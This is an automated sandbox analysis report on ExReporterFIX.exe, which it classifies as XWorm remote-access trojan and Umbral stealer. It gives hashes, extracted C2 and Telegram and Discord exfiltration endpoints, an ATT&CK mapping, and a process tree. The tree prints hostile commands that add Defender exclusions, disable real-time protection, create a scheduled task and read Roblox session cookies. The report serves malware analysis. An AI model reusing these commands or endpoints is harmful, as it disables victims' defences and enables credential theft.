Overview

overview

10

Static

static

10

ExReporterFIX.exe

windows10-1703-x64

10

ExReporterFIX.exe

windows7-x64

10

ExReporterFIX.exe

windows10-2004-x64

10

ExReporterFIX.exe

windows11-21h2-x64

10

Resubmissions

11-08-2024 23:49

240811-3t2svszbkg 10

10-08-2024 12:02

240810-n7h6caybrp 10

Analysis

  • max time kernel
    1795s
  • max time network
    1790s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    10-08-2024 12:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ExReporterFIX.exe

  • Size

    65KB

  • MD5

    5d36dc879659d7eecf5a0867bbd05165

  • SHA1

    d23b8a98691b5a0379f761ea1669869690e3fd9f

  • SHA256

    4589073aab658c11af8490bc2d39d8b7c6d16e313320a9c67a6cbb7408f8af4a

  • SHA512

    854bc8b9406bcc57cc56ff4d19bae4cc8a18a4fa4f4543c6064413e004a34386dec35dfd617c181d163d5038e068fd442a4eb4a45caa9905c78c29ee210864f4

  • SSDEEP

    1536:kxJhEM7T/hC+xaaGbb05/Txd4j6txHO56197:YJ+MnheaMb0NHO56f7

Score
10/10
umbralxwormcredential_accessdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

21.ip.gl.ply.gg:21222

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    ExReporters.exe

  • telegram

    https://api.telegram.org/bot7307556336:AAFxy7gvsomu0v1K0jbYvC1K7DBoqhWv9ek/sendMessage?chat_id=1748805076

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1262272632624119890/xq4naaT12so0HgOJenvdDa7K9KWwQtUVK9YXhZ9JaKjvQdbyOYkanAIUiPtf0QhG2GwL

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 23 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 31 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\ExReporterFIX.exe
    "C:\Users\Admin\AppData\Local\Temp\ExReporterFIX.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ExReporterFIX.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ExReporterFIX.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\ExReporters.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ExReporters.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2600
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ExReporters" /tr "C:\Users\Admin\AppData\Local\ExReporters.exe"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1608
    • C:\Users\Admin\AppData\Local\Temp\qhzcbp.exe
      "C:\Users\Admin\AppData\Local\Temp\qhzcbp.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1676
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1984
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\qhzcbp.exe"
        3⤵
        • Views/modifies file attributes
        PID:1336
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\qhzcbp.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1332
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1764
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
          PID:1852
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          3⤵
            PID:1596
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            3⤵
              PID:2384
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3016
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              3⤵
              • Detects videocard installed
              PID:1724
            • C:\Windows\system32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\qhzcbp.exe" && pause
              3⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              PID:2628
              • C:\Windows\system32\PING.EXE
                ping localhost
                4⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:2688
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {55C48CB1-0EDA-416F-864B-DED2C90F28D5} S-1-5-21-3502430532-24693940-2469786940-1000:PSBQWFYT\Admin:Interactive:[1]
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:2548
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2036
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2196
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2360
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2308
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:268
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2948
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2692
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2508
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2616
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1656
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2388
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2264
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2840
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1736
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2168
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:648
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1476
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2384
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1532
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2764
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2716
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1616
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:324
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:316
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1780
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            PID:976
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            PID:184
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            PID:2432
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            PID:1952
          • C:\Users\Admin\AppData\Local\ExReporters.exe
            C:\Users\Admin\AppData\Local\ExReporters.exe
            2⤵
            • Executes dropped EXE
            PID:2668

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Defense Evasion

        Hide Artifacts

        1
        T1564

        Hidden Files and Directories

        1
        T1564.001

        Modify Registry

        1
        T1112

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Query Registry

        1
        T1012

        Remote System Discovery

        1
        T1018

        System Information Discovery

        2
        T1082

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Web Service

        1
        T1102

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\ExReporters.exe
          Filesize

          65KB

          MD5

          5d36dc879659d7eecf5a0867bbd05165

          SHA1

          d23b8a98691b5a0379f761ea1669869690e3fd9f

          SHA256

          4589073aab658c11af8490bc2d39d8b7c6d16e313320a9c67a6cbb7408f8af4a

          SHA512

          854bc8b9406bcc57cc56ff4d19bae4cc8a18a4fa4f4543c6064413e004a34386dec35dfd617c181d163d5038e068fd442a4eb4a45caa9905c78c29ee210864f4

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\qhzcbp.exe
          Filesize

          231KB

          MD5

          3849d45ec08cbd9a77c5852372b2689a

          SHA1

          fb26ba243dc3b9016636a40320f8c3b94d152b36

          SHA256

          3e688ce2a65cec47ac034d421726f0dd127a59e4120fe6e8de6fcb34bd8513e1

          SHA512

          6e6c46a416a63dca56147a43ed072a4b1c3db94c516ea24266263e24e9ab34358611dd9d436c09e4d34d26bbbba786c443dcdadacd97bb911f4f8d85ab867d02

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          181b98b08e0dfda2b36d22aba9a52caa

          SHA1

          26b0cfcdd5a73fe0dd46c2dc47f49b1eba8e51cb

          SHA256

          d92807abdf75da67766b7afbb494db983dd75f830d625191fdb4894b20bc38f4

          SHA512

          515a7b225f01c87dcee4253e25169cb55941d65f9fac28def278e16ce235d174bc450f49927b007f906c97d11e4a6b2a7aa5d25295aa6c19b4016cd78b5a61bf

          Download Submit

        • memory/268-46-0x00000000003C0000-0x00000000003D6000-memory.dmp

          Filesize

          88KB

          Download

        • memory/316-79-0x00000000003E0000-0x00000000003F6000-memory.dmp

          Filesize

          88KB

          Download

        • memory/324-77-0x0000000001070000-0x0000000001086000-memory.dmp

          Filesize

          88KB

          Download

        • memory/648-64-0x0000000000860000-0x0000000000876000-memory.dmp

          Filesize

          88KB

          Download

        • memory/976-130-0x0000000000E00000-0x0000000000E16000-memory.dmp

          Filesize

          88KB

          Download

        • memory/1476-66-0x00000000011B0000-0x00000000011C6000-memory.dmp

          Filesize

          88KB

          Download

        • memory/1532-69-0x00000000000F0000-0x0000000000106000-memory.dmp

          Filesize

          88KB

          Download

        • memory/1616-75-0x0000000000D00000-0x0000000000D16000-memory.dmp

          Filesize

          88KB

          Download

        • memory/1676-87-0x00000000011F0000-0x0000000001230000-memory.dmp

          Filesize

          256KB

          Download

        • memory/1692-9-0x00000000021D0000-0x00000000021D8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1692-8-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1692-7-0x00000000028A0000-0x0000000002920000-memory.dmp

          Filesize

          512KB

          Download

        • memory/1780-81-0x0000000000870000-0x0000000000886000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2036-37-0x00000000000E0000-0x00000000000F6000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2168-62-0x0000000000170000-0x0000000000186000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2176-93-0x00000000026A0000-0x00000000026A8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2196-40-0x0000000001220000-0x0000000001236000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2264-58-0x0000000000FD0000-0x0000000000FE6000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2308-43-0x0000000000100000-0x0000000000116000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2388-56-0x00000000002A0000-0x00000000002B6000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2432-133-0x0000000000F70000-0x0000000000F86000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2612-16-0x00000000027F0000-0x00000000027F8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2612-15-0x000000001B740000-0x000000001BA22000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/2616-53-0x0000000000EB0000-0x0000000000EC6000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2692-50-0x0000000000D10000-0x0000000000D26000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2716-73-0x0000000000850000-0x0000000000866000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2764-71-0x00000000003D0000-0x00000000003E6000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2868-0-0x000007FEF65F3000-0x000007FEF65F4000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2868-44-0x0000000000D50000-0x0000000000D5C000-memory.dmp

          Filesize

          48KB

          Download

        • memory/2868-33-0x000007FEF65F0000-0x000007FEF6FDC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2868-32-0x000007FEF65F3000-0x000007FEF65F4000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2868-2-0x000007FEF65F0000-0x000007FEF6FDC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2868-1-0x0000000000E80000-0x0000000000E96000-memory.dmp

          Filesize

          88KB

          Download

        • memory/2948-48-0x0000000000980000-0x0000000000996000-memory.dmp

          Filesize

          88KB

          Download